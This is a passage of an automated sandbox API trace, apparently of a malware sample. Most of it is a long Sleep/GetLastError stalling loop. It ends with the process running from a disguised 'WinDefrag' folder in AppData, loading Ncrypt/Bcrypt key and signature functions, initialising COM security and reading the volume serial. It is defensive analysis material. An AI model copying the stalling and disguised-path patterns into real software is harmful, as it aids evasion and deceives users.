() returned 0x0 [0163.765] Sleep (dwMilliseconds=0x1) [0163.779] GetLastError () returned 0x0 [0163.779] Sleep (dwMilliseconds=0x1) [0163.794] GetLastError () returned 0x0 [0163.794] Sleep (dwMilliseconds=0x1) [0163.810] GetLastError () returned 0x0 [0163.810] Sleep (dwMilliseconds=0x1) [0163.831] GetLastError () returned 0x0 [0163.831] Sleep (dwMilliseconds=0x1) [0163.841] GetLastError () returned 0x0 [0163.841] Sleep (dwMilliseconds=0x1) [0163.857] GetLastError () returned 0x0 [0163.857] Sleep (dwMilliseconds=0x1) [0163.873] GetLastError () returned 0x0 [0163.873] Sleep (dwMilliseconds=0x1) [0163.888] GetLastError () returned 0x0 [0163.888] Sleep (dwMilliseconds=0x1) [0163.904] GetLastError () returned 0x0 [0163.904] Sleep (dwMilliseconds=0x1) [0163.920] GetLastError () returned 0x0 [0163.920] Sleep (dwMilliseconds=0x1) [0163.935] GetLastError () returned 0x0 [0163.935] Sleep (dwMilliseconds=0x1) [0163.951] GetLastError () returned 0x0 [0163.951] Sleep (dwMilliseconds=0x1) [0163.966] GetLastError () returned 0x0 [0163.966] Sleep (dwMilliseconds=0x1) [0163.982] GetLastError () returned 0x0 [0163.982] Sleep (dwMilliseconds=0x1) [0163.997] GetLastError () returned 0x0 [0163.997] Sleep (dwMilliseconds=0x1) [0164.013] GetLastError () returned 0x0 [0164.013] Sleep (dwMilliseconds=0x1) [0164.029] GetLastError () returned 0x0 [0164.029] Sleep (dwMilliseconds=0x1) [0164.044] GetLastError () returned 0x0 [0164.044] Sleep (dwMilliseconds=0x1) [0164.060] GetLastError () returned 0x0 [0164.060] Sleep (dwMilliseconds=0x1) [0164.076] GetLastError () returned 0x0 [0164.076] Sleep (dwMilliseconds=0x1) [0164.092] GetLastError () returned 0x0 [0164.092] Sleep (dwMilliseconds=0x1) [0164.106] GetLastError () returned 0x0 [0164.106] Sleep (dwMilliseconds=0x1) [0164.122] GetLastError () returned 0x0 [0164.122] Sleep (dwMilliseconds=0x1) [0164.138] GetLastError () returned 0x0 [0164.138] Sleep (dwMilliseconds=0x1) [0164.156] GetLastError () returned 0x0 [0164.156] Sleep (dwMilliseconds=0x1) [0164.169] GetLastError () returned 0x0 [0164.169] Sleep (dwMilliseconds=0x1) [0164.184] GetLastError () returned 0x0 [0164.184] Sleep (dwMilliseconds=0x1) [0164.200] GetLastError () returned 0x0 [0164.200] Sleep (dwMilliseconds=0x1) [0164.216] GetLastError () returned 0x0 [0164.216] Sleep (dwMilliseconds=0x1) [0164.231] GetLastError () returned 0x0 [0164.231] Sleep (dwMilliseconds=0x1) [0164.247] GetLastError () returned 0x0 [0164.247] Sleep (dwMilliseconds=0x1) [0164.262] GetLastError () returned 0x0 [0164.262] Sleep (dwMilliseconds=0x1) [0164.278] GetLastError () returned 0x0 [0164.278] Sleep (dwMilliseconds=0x1) [0164.294] GetLastError () returned 0x0 [0164.294] Sleep (dwMilliseconds=0x1) [0164.310] GetLastError () returned 0x0 [0164.310] Sleep (dwMilliseconds=0x1) [0164.378] GetLastError () returned 0x0 [0164.378] Sleep (dwMilliseconds=0x1) [0164.387] GetLastError () returned 0x0 [0164.387] Sleep (dwMilliseconds=0x1) [0164.403] GetLastError () returned 0x0 [0164.403] Sleep (dwMilliseconds=0x1) [0164.418] GetLastError () returned 0x0 [0164.418] Sleep (dwMilliseconds=0x1) [0164.435] GetLastError () returned 0x0 [0164.435] Sleep (dwMilliseconds=0x1) [0164.450] GetLastError () returned 0x0 [0164.450] Sleep (dwMilliseconds=0x1) [0164.465] GetLastError () returned 0x0 [0164.465] Sleep (dwMilliseconds=0x1) [0164.481] GetLastError () returned 0x0 [0164.481] Sleep (dwMilliseconds=0x1) [0164.497] GetLastError () returned 0x0 [0164.497] Sleep (dwMilliseconds=0x1) [0164.512] GetLastError () returned 0x0 [0164.512] Sleep (dwMilliseconds=0x1) [0164.528] GetLastError () returned 0x0 [0164.528] Sleep (dwMilliseconds=0x1) [0164.546] GetLastError () returned 0x0 [0164.546] Sleep (dwMilliseconds=0x1) [0164.559] GetLastError () returned 0x0 [0164.559] Sleep (dwMilliseconds=0x1) [0164.574] GetLastError () returned 0x0 [0164.574] Sleep (dwMilliseconds=0x1) [0164.590] GetLastError () returned 0x0 [0164.590] Sleep (dwMilliseconds=0x1) [0164.606] GetLastError () returned 0x0 [0164.606] Sleep (dwMilliseconds=0x1) [0164.623] GetLastError () returned 0x0 [0164.623] Sleep (dwMilliseconds=0x1) [0164.642] GetLastError () returned 0x0 [0164.642] Sleep (dwMilliseconds=0x1) [0164.653] GetLastError () returned 0x0 [0164.653] Sleep (dwMilliseconds=0x1) [0164.668] GetLastError () returned 0x0 [0164.668] Sleep (dwMilliseconds=0x1) [0164.684] GetLastError () returned 0x0 [0164.684] Sleep (dwMilliseconds=0x1) [0164.699] GetLastError () returned 0x0 [0164.699] Sleep (dwMilliseconds=0x1) [0164.715] GetLastError () returned 0x0 [0164.715] Sleep (dwMilliseconds=0x1) [0164.730] GetLastError () returned 0x0 [0164.730] Sleep (dwMilliseconds=0x1) [0164.748] GetLastError () returned 0x0 [0164.748] Sleep (dwMilliseconds=0x1) [0164.762] GetLastError () returned 0x0 [0164.762] Sleep (dwMilliseconds=0x1) [0164.777] GetLastError () returned 0x0 [0164.777] Sleep (dwMilliseconds=0x1) [0164.793] GetLastError () returned 0x0 [0164.793] Sleep (dwMilliseconds=0x1) [0164.809] GetLastError () returned 0x0 [0164.809] Sleep (dwMilliseconds=0x1) [0164.824] GetLastError () returned 0x0 [0164.824] Sleep (dwMilliseconds=0x1) [0164.840] GetLastError () returned 0x0 [0164.840] Sleep (dwMilliseconds=0x1) [0164.855] GetLastError () returned 0x0 [0164.855] Sleep (dwMilliseconds=0x1) [0164.872] GetLastError () returned 0x0 [0164.872] Sleep (dwMilliseconds=0x1) [0164.886] GetLastError () returned 0x0 [0164.886] Sleep (dwMilliseconds=0x1) [0164.902] GetLastError () returned 0x0 [0164.902] Sleep (dwMilliseconds=0x1) [0164.918] GetLastError () returned 0x0 [0164.918] Sleep (dwMilliseconds=0x1) [0164.933] GetLastError () returned 0x0 [0164.933] Sleep (dwMilliseconds=0x1) [0164.949] GetLastError () returned 0x0 [0164.949] Sleep (dwMilliseconds=0x1) [0164.964] GetLastError () returned 0x0 [0164.965] Sleep (dwMilliseconds=0x1) [0164.980] GetLastError () returned 0x0 [0164.980] Sleep (dwMilliseconds=0x1) [0164.996] GetLastError () returned 0x0 [0164.996] Sleep (dwMilliseconds=0x1) [0165.011] GetLastError () returned 0x0 [0165.011] Sleep (dwMilliseconds=0x1) [0165.030] GetLastError () returned 0x0 [0165.030] Sleep (dwMilliseconds=0x1) [0165.043] GetLastError () returned 0x0 [0165.043] Sleep (dwMilliseconds=0x1) [0165.058] GetLastError () returned 0x0 [0165.058] Sleep (dwMilliseconds=0x1) [0165.074] GetLastError () returned 0x0 [0165.074] Sleep (dwMilliseconds=0x1) [0165.089] GetLastError () returned 0x0 [0165.089] Sleep (dwMilliseconds=0x1) [0165.105] GetLastError () returned 0x0 [0165.105] Sleep (dwMilliseconds=0x1) [0165.125] GetLastError () returned 0x0 [0165.125] Sleep (dwMilliseconds=0x1) [0165.136] GetLastError () returned 0x0 [0165.136] Sleep (dwMilliseconds=0x1) [0165.152] GetLastError () returned 0x0 [0165.152] Sleep (dwMilliseconds=0x1) [0165.167] GetLastError () returned 0x0 [0165.167] Sleep (dwMilliseconds=0x1) [0165.183] GetLastError () returned 0x0 [0165.183] Sleep (dwMilliseconds=0x1) [0165.208] GetLastError () returned 0x0 [0165.208] Sleep (dwMilliseconds=0x1) [0165.214] GetLastError () returned 0x0 [0165.214] Sleep (dwMilliseconds=0x1) [0165.230] GetLastError () returned 0x0 [0165.230] Sleep (dwMilliseconds=0x1) [0165.245] GetLastError () returned 0x0 [0165.245] Sleep (dwMilliseconds=0x1) [0165.261] GetLastError () returned 0x0 [0165.261] Sleep (dwMilliseconds=0x1) [0165.276] GetLastError () returned 0x0 [0165.276] Sleep (dwMilliseconds=0x1) [0165.292] GetLastError () returned 0x0 [0165.292] Sleep (dwMilliseconds=0x1) [0165.308] GetLastError () returned 0x0 [0165.308] Sleep (dwMilliseconds=0x1) [0165.379] GetLastError () returned 0x0 [0165.379] Sleep (dwMilliseconds=0x1) [0165.393] GetLastError () returned 0x0 [0165.393] Sleep (dwMilliseconds=0x1) [0165.401] GetLastError () returned 0x0 [0165.401] Sleep (dwMilliseconds=0x1) [0165.417] GetLastError () returned 0x0 [0165.417] Sleep (dwMilliseconds=0x1) [0165.433] GetLastError () returned 0x0 [0165.433] Sleep (dwMilliseconds=0x1) [0165.448] GetLastError () returned 0x0 [0165.448] Sleep (dwMilliseconds=0x1) [0165.464] GetLastError () returned 0x0 [0165.464] Sleep (dwMilliseconds=0x1) [0165.480] GetLastError () returned 0x0 [0165.480] Sleep (dwMilliseconds=0x1) [0165.495] GetLastError () returned 0x0 [0165.495] Sleep (dwMilliseconds=0x1) [0165.511] GetLastError () returned 0x0 [0165.511] Sleep (dwMilliseconds=0x1) [0165.526] GetLastError () returned 0x0 [0165.526] Sleep (dwMilliseconds=0x1) [0165.542] GetLastError () returned 0x0 [0165.542] Sleep (dwMilliseconds=0x1) [0165.566] GetLastError () returned 0x0 [0165.566] Sleep (dwMilliseconds=0x1) [0165.573] GetLastError () returned 0x0 [0165.573] Sleep (dwMilliseconds=0x1) [0165.590] GetLastError () returned 0x0 [0165.590] Sleep (dwMilliseconds=0x1) [0165.604] GetLastError () returned 0x0 [0165.604] Sleep (dwMilliseconds=0x1) [0165.620] GetLastError () returned 0x0 [0165.620] Sleep (dwMilliseconds=0x1) [0165.635] GetLastError () returned 0x0 [0165.635] Sleep (dwMilliseconds=0x1) [0165.652] GetLastError () returned 0x0 [0165.652] Sleep (dwMilliseconds=0x1) [0165.666] GetLastError () returned 0x0 [0165.666] Sleep (dwMilliseconds=0x1) [0165.684] GetLastError () returned 0x0 [0165.684] Sleep (dwMilliseconds=0x1) [0165.698] GetLastError () returned 0x0 [0165.698] Sleep (dwMilliseconds=0x1) [0165.713] GetLastError () returned 0x0 [0165.713] Sleep (dwMilliseconds=0x1) [0165.729] GetLastError () returned 0x0 [0165.729] Sleep (dwMilliseconds=0x1) [0165.744] GetLastError () returned 0x0 [0165.745] Sleep (dwMilliseconds=0x1) [0165.760] GetLastError () returned 0x0 [0165.760] Sleep (dwMilliseconds=0x1) [0165.776] GetLastError () returned 0x0 [0165.776] Sleep (dwMilliseconds=0x1) [0165.791] GetLastError () returned 0x0 [0165.791] Sleep (dwMilliseconds=0x1) [0165.807] GetLastError () returned 0x0 [0165.807] Sleep (dwMilliseconds=0x1) [0165.822] GetLastError () returned 0x0 [0165.822] Sleep (dwMilliseconds=0x1) [0165.838] GetLastError () returned 0x0 [0165.838] Sleep (dwMilliseconds=0x1) [0165.854] GetLastError () returned 0x0 [0165.854] Sleep (dwMilliseconds=0x1) [0165.869] GetLastError () returned 0x0 [0165.869] Sleep (dwMilliseconds=0x1) [0165.885] GetLastError () returned 0x0 [0165.885] Sleep (dwMilliseconds=0x1) [0165.900] GetLastError () returned 0x0 [0165.900] Sleep (dwMilliseconds=0x1) [0165.916] GetLastError () returned 0x0 [0165.916] Sleep (dwMilliseconds=0x1) [0165.932] GetLastError () returned 0x0 [0165.932] Sleep (dwMilliseconds=0x1) [0165.947] GetLastError () returned 0x0 [0165.947] Sleep (dwMilliseconds=0x1) [0165.963] GetLastError () returned 0x0 [0165.963] Sleep (dwMilliseconds=0x1) [0165.980] GetLastError () returned 0x0 [0165.980] Sleep (dwMilliseconds=0x1) [0165.994] GetLastError () returned 0x0 [0165.994] Sleep (dwMilliseconds=0x1) [0166.010] GetLastError () returned 0x0 [0166.010] Sleep (dwMilliseconds=0x1) [0166.025] GetLastError () returned 0x0 [0166.025] Sleep (dwMilliseconds=0x1) [0166.041] GetLastError () returned 0x0 [0166.041] Sleep (dwMilliseconds=0x1) [0166.057] GetLastError () returned 0x0 [0166.057] Sleep (dwMilliseconds=0x1) [0166.072] GetLastError () returned 0x0 [0166.072] Sleep (dwMilliseconds=0x1) [0166.088] GetLastError () returned 0x0 [0166.088] Sleep (dwMilliseconds=0x1) [0166.103] GetLastError () returned 0x0 [0166.103] Sleep (dwMilliseconds=0x1) [0166.119] GetLastError () returned 0x0 [0166.119] Sleep (dwMilliseconds=0x1) [0166.134] GetLastError () returned 0x0 [0166.134] Sleep (dwMilliseconds=0x1) [0166.150] GetLastError () returned 0x0 [0166.150] Sleep (dwMilliseconds=0x1) [0166.166] GetLastError () returned 0x0 [0166.166] Sleep (dwMilliseconds=0x1) [0166.181] GetLastError () returned 0x0 [0166.181] Sleep (dwMilliseconds=0x1) [0166.198] GetLastError () returned 0x0 [0166.198] Sleep (dwMilliseconds=0x1) [0166.213] GetLastError () returned 0x0 [0166.213] Sleep (dwMilliseconds=0x1) [0166.228] GetLastError () returned 0x0 [0166.228] Sleep (dwMilliseconds=0x1) [0166.244] GetLastError () returned 0x0 [0166.244] Sleep (dwMilliseconds=0x1) [0166.259] GetLastError () returned 0x0 [0166.259] Sleep (dwMilliseconds=0x1) [0166.275] GetLastError () returned 0x0 [0166.275] Sleep (dwMilliseconds=0x1) [0166.290] GetLastError () returned 0x0 [0166.290] Sleep (dwMilliseconds=0x1) [0166.306] GetLastError () returned 0x0 [0166.306] Sleep (dwMilliseconds=0x1) [0166.371] GetLastError () returned 0x0 [0166.371] Sleep (dwMilliseconds=0x1) [0166.384] GetLastError () returned 0x0 [0166.384] Sleep (dwMilliseconds=0x1) [0166.400] GetLastError () returned 0x0 [0166.400] Sleep (dwMilliseconds=0x1) [0166.415] GetLastError () returned 0x0 [0166.415] Sleep (dwMilliseconds=0x1) [0166.431] GetLastError () returned 0x0 [0166.431] Sleep (dwMilliseconds=0x1) [0166.447] GetLastError () returned 0x0 [0166.447] Sleep (dwMilliseconds=0x1) [0166.462] GetLastError () returned 0x0 [0166.462] Sleep (dwMilliseconds=0x1) [0166.478] GetLastError () returned 0x0 [0166.478] Sleep (dwMilliseconds=0x1) [0166.493] GetLastError () returned 0x0 [0166.493] Sleep (dwMilliseconds=0x1) [0166.509] GetLastError () returned 0x0 [0166.509] Sleep (dwMilliseconds=0x1) [0166.525] GetLastError () returned 0x0 [0166.525] Sleep (dwMilliseconds=0x1) [0166.540] GetLastError () returned 0x0 [0166.540] Sleep (dwMilliseconds=0x1) [0166.556] GetLastError () returned 0x0 [0166.556] Sleep (dwMilliseconds=0x1) [0166.571] GetLastError () returned 0x0 [0166.571] Sleep (dwMilliseconds=0x1) [0166.587] GetLastError () returned 0x0 [0166.587] Sleep (dwMilliseconds=0x1) [0166.603] GetLastError () returned 0x0 [0166.604] Sleep (dwMilliseconds=0x1) [0166.618] GetLastError () returned 0x0 [0166.618] Sleep (dwMilliseconds=0x1) [0166.634] GetLastError () returned 0x0 [0166.634] Sleep (dwMilliseconds=0x1) [0166.650] GetLastError () returned 0x0 [0166.650] Sleep (dwMilliseconds=0x1) [0166.665] GetLastError () returned 0x0 [0166.665] Sleep (dwMilliseconds=0x1) [0166.681] GetLastError () returned 0x0 [0166.681] Sleep (dwMilliseconds=0x1) [0166.698] GetLastError () returned 0x0 [0166.698] Sleep (dwMilliseconds=0x1) [0166.712] GetLastError () returned 0x0 [0166.712] Sleep (dwMilliseconds=0x1) [0166.727] GetLastError () returned 0x0 [0166.727] Sleep (dwMilliseconds=0x1) [0166.744] GetLastError () returned 0x0 [0166.744] Sleep (dwMilliseconds=0x1) [0166.758] GetLastError () returned 0x0 [0166.758] Sleep (dwMilliseconds=0x1) [0166.774] GetLastError () returned 0x0 [0166.774] Sleep (dwMilliseconds=0x1) [0166.790] GetLastError () returned 0x0 [0166.790] Sleep (dwMilliseconds=0x1) [0166.805] GetLastError () returned 0x0 [0166.805] Sleep (dwMilliseconds=0x1) [0166.821] GetLastError () returned 0x0 [0166.821] Sleep (dwMilliseconds=0x1) [0166.836] GetLastError () returned 0x0 [0166.836] Sleep (dwMilliseconds=0x1) [0166.852] GetLastError () returned 0x0 [0166.852] Sleep (dwMilliseconds=0x1) [0166.868] GetLastError () returned 0x0 [0166.868] Sleep (dwMilliseconds=0x1) [0166.883] GetLastError () returned 0x0 [0166.883] Sleep (dwMilliseconds=0x1) [0166.899] GetLastError () returned 0x0 [0166.899] Sleep (dwMilliseconds=0x1) [0166.914] GetLastError () returned 0x0 [0166.914] Sleep (dwMilliseconds=0x1) [0166.931] GetLastError () returned 0x0 [0166.931] Sleep (dwMilliseconds=0x1) [0166.946] GetLastError () returned 0x0 [0166.946] Sleep (dwMilliseconds=0x1) [0166.964] GetLastError () returned 0x0 [0166.964] Sleep (dwMilliseconds=0x1) [0166.979] GetLastError () returned 0x0 [0166.979] Sleep (dwMilliseconds=0x1) [0166.994] GetLastError () returned 0x0 [0166.994] Sleep (dwMilliseconds=0x1) [0167.013] GetLastError () returned 0x0 [0167.013] Sleep (dwMilliseconds=0x1) [0167.033] GetLastError () returned 0x0 [0167.033] Sleep (dwMilliseconds=0x1) [0167.050] GetLastError () returned 0x0 [0167.050] Sleep (dwMilliseconds=0x1) [0167.067] GetLastError () returned 0x0 [0167.067] Sleep (dwMilliseconds=0x1) [0167.071] GetLastError () returned 0x0 [0167.071] Sleep (dwMilliseconds=0x1) [0167.087] GetLastError () returned 0x0 [0167.087] Sleep (dwMilliseconds=0x1) [0167.106] GetLastError () returned 0x0 [0167.106] Sleep (dwMilliseconds=0x1) [0167.118] GetLastError () returned 0x0 [0167.118] Sleep (dwMilliseconds=0x1) [0167.133] GetLastError () returned 0x0 [0167.133] Sleep (dwMilliseconds=0x1) [0167.148] GetLastError () returned 0x0 [0167.149] Sleep (dwMilliseconds=0x1) [0167.164] GetLastError () returned 0x0 [0167.164] Sleep (dwMilliseconds=0x1) [0167.180] GetLastError () returned 0x0 [0167.180] Sleep (dwMilliseconds=0x1) [0167.195] GetLastError () returned 0x0 [0167.195] Sleep (dwMilliseconds=0x1) [0167.211] GetLastError () returned 0x0 [0167.211] Sleep (dwMilliseconds=0x1) [0167.227] GetLastError () returned 0x0 [0167.227] Sleep (dwMilliseconds=0x1) [0167.242] GetLastError () returned 0x0 [0167.242] Sleep (dwMilliseconds=0x1) [0167.258] GetLastError () returned 0x0 [0167.258] Sleep (dwMilliseconds=0x1) [0167.274] GetLastError () returned 0x0 [0167.274] Sleep (dwMilliseconds=0x1) [0167.289] GetLastError () returned 0x0 [0167.289] Sleep (dwMilliseconds=0x1) [0167.305] GetLastError () returned 0x0 [0167.305] Sleep (dwMilliseconds=0x1) [0167.383] GetLastError () returned 0x0 [0167.383] Sleep (dwMilliseconds=0x1) [0167.398] GetLastError () returned 0x0 [0167.398] Sleep (dwMilliseconds=0x1) [0167.414] GetLastError () returned 0x0 [0167.414] Sleep (dwMilliseconds=0x1) [0167.429] GetLastError () returned 0x0 [0167.429] Sleep (dwMilliseconds=0x1) [0167.445] GetLastError () returned 0x0 [0167.445] Sleep (dwMilliseconds=0x1) [0167.461] GetLastError () returned 0x0 [0167.461] Sleep (dwMilliseconds=0x1) [0167.478] GetLastError () returned 0x0 [0167.478] Sleep (dwMilliseconds=0x1) [0167.492] GetLastError () returned 0x0 [0167.492] Sleep (dwMilliseconds=0x1) [0167.508] GetLastError () returned 0x0 [0167.508] Sleep (dwMilliseconds=0x1) [0167.523] GetLastError () returned 0x0 [0167.523] Sleep (dwMilliseconds=0x1) [0167.538] GetLastError () returned 0x0 [0167.539] Sleep (dwMilliseconds=0x1) [0167.554] GetLastError () returned 0x0 [0167.554] Sleep (dwMilliseconds=0x1) [0167.570] GetLastError () returned 0x0 [0167.570] Sleep (dwMilliseconds=0x1) [0167.585] GetLastError () returned 0x0 [0167.585] Sleep (dwMilliseconds=0x1) [0167.601] GetLastError () returned 0x0 [0167.601] Sleep (dwMilliseconds=0x1) [0167.617] GetLastError () returned 0x0 [0167.617] Sleep (dwMilliseconds=0x1) [0167.632] GetLastError () returned 0x0 [0167.632] Sleep (dwMilliseconds=0x1) [0167.655] GetLastError () returned 0x0 [0167.655] Sleep (dwMilliseconds=0x1) [0167.663] GetLastError () returned 0x0 [0167.663] Sleep (dwMilliseconds=0x1) [0167.679] GetLastError () returned 0x0 [0167.679] Sleep (dwMilliseconds=0x1) [0167.695] GetLastError () returned 0x0 [0167.695] Sleep (dwMilliseconds=0x1) [0167.710] GetLastError () returned 0x0 [0167.711] Sleep (dwMilliseconds=0x1) [0167.730] GetLastError () returned 0x0 [0167.730] Sleep (dwMilliseconds=0x1) [0167.741] GetLastError () returned 0x0 [0167.741] Sleep (dwMilliseconds=0x1) [0167.757] GetLastError () returned 0x0 [0167.757] Sleep (dwMilliseconds=0x1) [0167.772] GetLastError () returned 0x0 [0167.773] Sleep (dwMilliseconds=0x1) [0167.788] GetLastError () returned 0x0 [0167.788] Sleep (dwMilliseconds=0x1) [0167.805] GetLastError () returned 0x0 [0167.805] Sleep (dwMilliseconds=0x1) [0167.820] GetLastError () returned 0x0 [0167.820] Sleep (dwMilliseconds=0x1) [0167.835] GetLastError () returned 0x0 [0167.835] Sleep (dwMilliseconds=0x1) [0167.851] GetLastError () returned 0x0 [0167.851] Sleep (dwMilliseconds=0x1) [0167.866] GetLastError () returned 0x0 [0167.866] Sleep (dwMilliseconds=0x1) [0167.882] GetLastError () returned 0x0 [0167.882] Sleep (dwMilliseconds=0x1) [0167.897] GetLastError () returned 0x0 [0167.897] Sleep (dwMilliseconds=0x1) [0167.913] GetLastError () returned 0x0 [0167.913] Sleep (dwMilliseconds=0x1) [0167.929] GetLastError () returned 0x0 [0167.929] Sleep (dwMilliseconds=0x1) [0167.944] GetLastError () returned 0x0 [0167.944] Sleep (dwMilliseconds=0x1) [0167.960] GetLastError () returned 0x0 [0167.960] Sleep (dwMilliseconds=0x1) [0167.975] GetLastError () returned 0x0 [0167.975] Sleep (dwMilliseconds=0x1) [0167.991] GetLastError () returned 0x0 [0167.991] Sleep (dwMilliseconds=0x1) [0168.007] GetLastError () returned 0x0 [0168.007] Sleep (dwMilliseconds=0x1) [0168.022] GetLastError () returned 0x0 [0168.022] Sleep (dwMilliseconds=0x1) [0168.038] GetLastError () returned 0x0 [0168.038] Sleep (dwMilliseconds=0x1) [0168.053] GetLastError () returned 0x0 [0168.053] Sleep (dwMilliseconds=0x1) [0168.069] GetLastError () returned 0x0 [0168.069] Sleep (dwMilliseconds=0x1) [0168.085] GetLastError () returned 0x0 [0168.085] Sleep (dwMilliseconds=0x1) [0168.100] GetLastError () returned 0x0 [0168.100] Sleep (dwMilliseconds=0x1) [0168.116] GetLastError () returned 0x0 [0168.116] Sleep (dwMilliseconds=0x1) [0168.131] GetLastError () returned 0x0 [0168.131] Sleep (dwMilliseconds=0x1) [0168.147] GetLastError () returned 0x0 [0168.147] Sleep (dwMilliseconds=0x1) [0168.162] GetLastError () returned 0x0 [0168.162] Sleep (dwMilliseconds=0x1) [0168.178] GetLastError () returned 0x0 [0168.178] Sleep (dwMilliseconds=0x1) [0168.194] GetLastError () returned 0x0 [0168.194] Sleep (dwMilliseconds=0x1) [0168.209] GetLastError () returned 0x0 [0168.209] Sleep (dwMilliseconds=0x1) [0168.225] GetLastError () returned 0x0 [0168.225] Sleep (dwMilliseconds=0x1) [0168.241] GetLastError () returned 0x0 [0168.241] Sleep (dwMilliseconds=0x1) [0168.256] GetLastError () returned 0x0 [0168.257] Sleep (dwMilliseconds=0x1) [0168.272] GetLastError () returned 0x0 [0168.272] Sleep (dwMilliseconds=0x1) [0168.287] GetLastError () returned 0x0 [0168.287] Sleep (dwMilliseconds=0x1) [0168.303] GetLastError () returned 0x0 [0168.303] Sleep (dwMilliseconds=0x1) [0168.377] GetLastError () returned 0x0 [0168.377] Sleep (dwMilliseconds=0x1) [0168.381] GetLastError () returned 0x0 [0168.381] Sleep (dwMilliseconds=0x1) [0168.397] GetLastError () returned 0x0 [0168.397] Sleep (dwMilliseconds=0x1) [0168.412] GetLastError () returned 0x0 [0168.412] Sleep (dwMilliseconds=0x1) [0168.428] GetLastError () returned 0x0 [0168.428] Sleep (dwMilliseconds=0x1) [0168.443] GetLastError () returned 0x0 [0168.443] Sleep (dwMilliseconds=0x1) [0168.459] GetLastError () returned 0x0 [0168.459] Sleep (dwMilliseconds=0x1) [0168.475] GetLastError () returned 0x0 [0168.475] Sleep (dwMilliseconds=0x1) [0168.490] GetLastError () returned 0x0 [0168.490] Sleep (dwMilliseconds=0x1) [0168.506] GetLastError () returned 0x0 [0168.506] Sleep (dwMilliseconds=0x1) [0168.522] GetLastError () returned 0x0 [0168.522] Sleep (dwMilliseconds=0x1) [0168.537] GetLastError () returned 0x0 [0168.537] Sleep (dwMilliseconds=0x1) [0168.553] GetLastError () returned 0x0 [0168.553] Sleep (dwMilliseconds=0x1) [0168.568] GetLastError () returned 0x0 [0168.568] Sleep (dwMilliseconds=0x1) [0168.584] GetLastError () returned 0x0 [0168.584] Sleep (dwMilliseconds=0x1) [0168.600] GetLastError () returned 0x0 [0168.600] Sleep (dwMilliseconds=0x1) [0168.615] GetLastError () returned 0x0 [0168.615] Sleep (dwMilliseconds=0x1) [0168.631] GetLastError () returned 0x0 [0168.631] Sleep (dwMilliseconds=0x1) [0168.646] GetLastError () returned 0x0 [0168.646] Sleep (dwMilliseconds=0x1) [0168.662] GetLastError () returned 0x0 [0168.662] Sleep (dwMilliseconds=0x1) [0168.677] GetLastError () returned 0x0 [0168.677] Sleep (dwMilliseconds=0x1) [0168.693] GetLastError () returned 0x0 [0168.693] Sleep (dwMilliseconds=0x1) [0168.709] GetLastError () returned 0x0 [0168.709] Sleep (dwMilliseconds=0x1) [0168.724] GetLastError () returned 0x0 [0168.724] Sleep (dwMilliseconds=0x1) [0168.740] GetLastError () returned 0x0 [0168.740] Sleep (dwMilliseconds=0x1) [0168.755] GetLastError () returned 0x0 [0168.756] Sleep (dwMilliseconds=0x1) [0168.771] GetLastError () returned 0x0 [0168.771] Sleep (dwMilliseconds=0x1) [0168.789] GetLastError () returned 0x0 [0168.789] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f9d0, nSize=0x200 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe")) returned 0x37 [0168.789] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag") returned 1 [0168.790] PathAddBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\") returned="" [0168.790] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag")) returned 1 [0168.790] GetTickCount () returned 0x34fe3 [0168.790] srand (_Seed=0x115f863) [0168.790] GetVersion () returned 0x1db10106 [0168.790] LoadLibraryW (lpLibFileName="Ncrypt.dll") returned 0x7fefd620000 [0168.794] LoadLibraryW (lpLibFileName="Bcrypt.dll") returned 0x7fefd5f0000 [0168.794] GetProcAddress (hModule=0x7fefd620000, lpProcName="NCryptOpenStorageProvider") returned 0x7fefd629990 [0168.794] GetProcAddress (hModule=0x7fefd620000, lpProcName="NCryptImportKey") returned 0x7fefd6255f0 [0168.794] GetProcAddress (hModule=0x7fefd620000, lpProcName="NCryptDeleteKey") returned 0x7fefd64f6a0 [0168.794] GetProcAddress (hModule=0x7fefd620000, lpProcName="NCryptFreeObject") returned 0x7fefd625c30 [0168.794] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x7fefd5f2640 [0168.795] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptImportKeyPair") returned 0x7fefd5f1d30 [0168.795] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptGetProperty") returned 0x7fefd5f1510 [0168.795] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptVerifySignature") returned 0x7fefd605bc0 [0168.795] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x7fefd5f32b0 [0168.795] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptDestroyKey") returned 0x7fefd5f16a0 [0168.795] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0169.033] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0169.043] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0169.044] GetWindowsDirectoryW (in: lpBuffer=0x18ea60, uSize=0x208 | out: lpBuffer="C:\\Windows") returned 0xa [0169.044] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18ec88, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18ec88*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0169.045] _vsnwprintf (in: _Buffer=0x18ecc0, _BufferCount=0x63, 